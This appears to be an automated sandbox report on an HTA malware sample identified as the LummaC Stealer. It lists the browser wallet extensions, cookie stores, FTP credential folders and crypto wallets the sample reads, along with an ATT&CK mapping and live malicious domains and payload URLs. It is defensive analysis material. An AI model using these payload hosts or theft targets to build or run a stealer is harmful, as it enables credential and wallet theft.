Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	111 Process Injection	3 Obfuscated Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	2 Software Packing	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	221 Virtualization/Sandbox Evasion	SSH	2 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	221 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Poket.mp4.hta	2%	Virustotal		Browse
Poket.mp4.hta	0%	ReversingLabs

Source	Detection	Scanner	Label
http://en.wPiX	0%	Avira URL Cloud	safe
https://cegu.shop/U	100%	Avira URL Cloud	malware
https://imbibelubmbe.click/api	0%	Avira URL Cloud	safe
https://cegu.shop/	100%	Avira URL Cloud	malware
https://klipvumisui.shop/int_clp_sha.txtopw	100%	Avira URL Cloud	malware
https://cegu.shop:443/8574262446/ph.txt	100%	Avira URL Cloud	malware
https://deduhko.klipzyroloo.shop	100%	Avira URL Cloud	malware
https://cegu.shop/8574262446/ph.txtebKit/537.36	100%	Avira URL Cloud	malware
https://cegu.shop/8574262446/ph.txtI	100%	Avira URL Cloud	malware
https://klipvumisui.shop/int_clp_sha.txta=	100%	Avira URL Cloud	malware
imbibelubmbe.click	0%	Avira URL Cloud	safe
https://cegu.shop/8574262446/ph.txtSVHj	100%	Avira URL Cloud	malware
https://cegu.shop/C	100%	Avira URL Cloud	malware
https://imbibelubmbe.click/	0%	Avira URL Cloud	safe
https://cegu.shop/x	100%	Avira URL Cloud	malware
https://imbibelubmbe.click/apiq	0%	Avira URL Cloud	safe
https://deduhko.klipzyroloo.shop/mazkk.eml	100%	Avira URL Cloud	malware
https://deduhko.klipzyroloo.shop/mazLR	100%	Avira URL Cloud	malware
https://deduhko.klipzyroloo.shop/mazkk.	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
imbibelubmbe.click	188.114.97.3	true	true	unknown
deduhko.klipzyroloo.shop	188.114.97.3	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
rabidcowse.shop	false		high
wholersorie.shop	false		high
https://imbibelubmbe.click/api	true	Avira URL Cloud: safe	unknown
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
imbibelubmbe.click	true	Avira URL Cloud: safe	unknown
nearycrepso.shop	false		high
https://cegu.shop/8574262446/ph.txt	false		high
https://deduhko.klipzyroloo.shop/mazkk.eml	true	Avira URL Cloud: malware	unknown
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://en.wPiX	mshta.exe, 00000000.00000003.1660293289.0000000005A61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cegu.shop:443/8574262446/ph.txt	powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1783096842.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	false		high
https://cegu.shop/	powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://deduhko.klipzyroloo.shop	powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://dfgh.online/invoker.php?compName=	powershell.exe, 0000000A.00000002.2890844747.0000000000779000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2893816228.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2897179208.0000000004D7E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop/U	powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop/8574262446/ph.txtI	powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cegu.shop/8574262446/ph.txtebKit/537.36	powershell.exe, 0000000A.00000002.2888825435.000000000032B000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://klipvumisui.shop/int_clp_sha.txtopw	powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://klipvumisui.shop/int_clp_sha.txta=	powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cegu.shop/8574262446/ph.txtSVHj	powershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mgravell/protobuf-neti	powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	false		high
https://cegu.shop/C	powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1781410096.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.0000000004661000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	false		high
https://deduhko.klipzyroloo.shop/mazLR	powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/	powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1783096842.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop/x	powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imbibelubmbe.click/	powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imbibelubmbe.click/apiq	powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1781410096.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.0000000004661000.00000004.00000800.00020000.00000000.sdmp	false		high
https://deduhko.klipzyroloo.shop/mazkk.	powershell.exe, 00000004.00000002.2542794546.0000000006D74000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://klipvumisui.shop/int_clp_sha.txt	powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	imbibelubmbe.click	European Union		13335	CLOUDFLARENETUS	true
185.161.251.21	cegu.shop	United Kingdom		5089	NTLGB	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582671
Start date and time:	2024-12-31 08:56:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Poket.mp4.hta
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winHTA@9/6@3/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 92% Number of executed functions: 182 Number of non-executed functions: 54
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 6748 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 4108 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:57:01	API Interceptor	87x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
185.161.251.21	setup.exe	Get hash	malicious	LummaC	Browse
	Active_Setup.exe	Get hash	malicious	LummaC	Browse
	Set-up.exe	Get hash	malicious	LummaC	Browse
	#Setup.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Set-up.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	#Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	185.161.251.21
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
imbibelubmbe.click	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse	104.21.42.198

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://nutricarm.es/wp-templates/f8b83.php	Get hash	malicious	Unknown	Browse	104.21.96.1
	Exlan_setup_v3.1.2.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	104.26.12.205
	http://ghostbin.cafe24.com/	Get hash	malicious	Unknown	Browse	104.18.27.193
	http://parrottalks.info	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	104.17.208.240
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.138.232
	Loader.exe	Get hash	malicious	Meduza Stealer	Browse	104.26.13.205
	https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Set-up.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	188.114.97.3
NTLGB	kwari.arm.elf	Get hash	malicious	Unknown	Browse	80.4.160.37
	setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Set-up.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	#Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	botx.ppc.elf	Get hash	malicious	Mirai	Browse	82.31.53.184
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	62.31.100.59
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	82.37.70.27
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	82.42.160.251

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	188.114.97.3
	Epsilon.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	XClient.exe	Get hash	malicious	XWorm	Browse	188.114.97.3
	hoEtvOOrYH.exe	Get hash	malicious	SmokeLoader	Browse	188.114.97.3
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	188.114.97.3
	random.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	eXbhgU9.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Supplier.bat	Get hash	malicious	Unknown	Browse	188.114.97.3
	Supplier.bat	Get hash	malicious	LodaRAT, XRed	Browse	188.114.97.3
	NEW-DRAWING-SHEET.bat	Get hash	malicious	Unknown	Browse	188.114.97.3
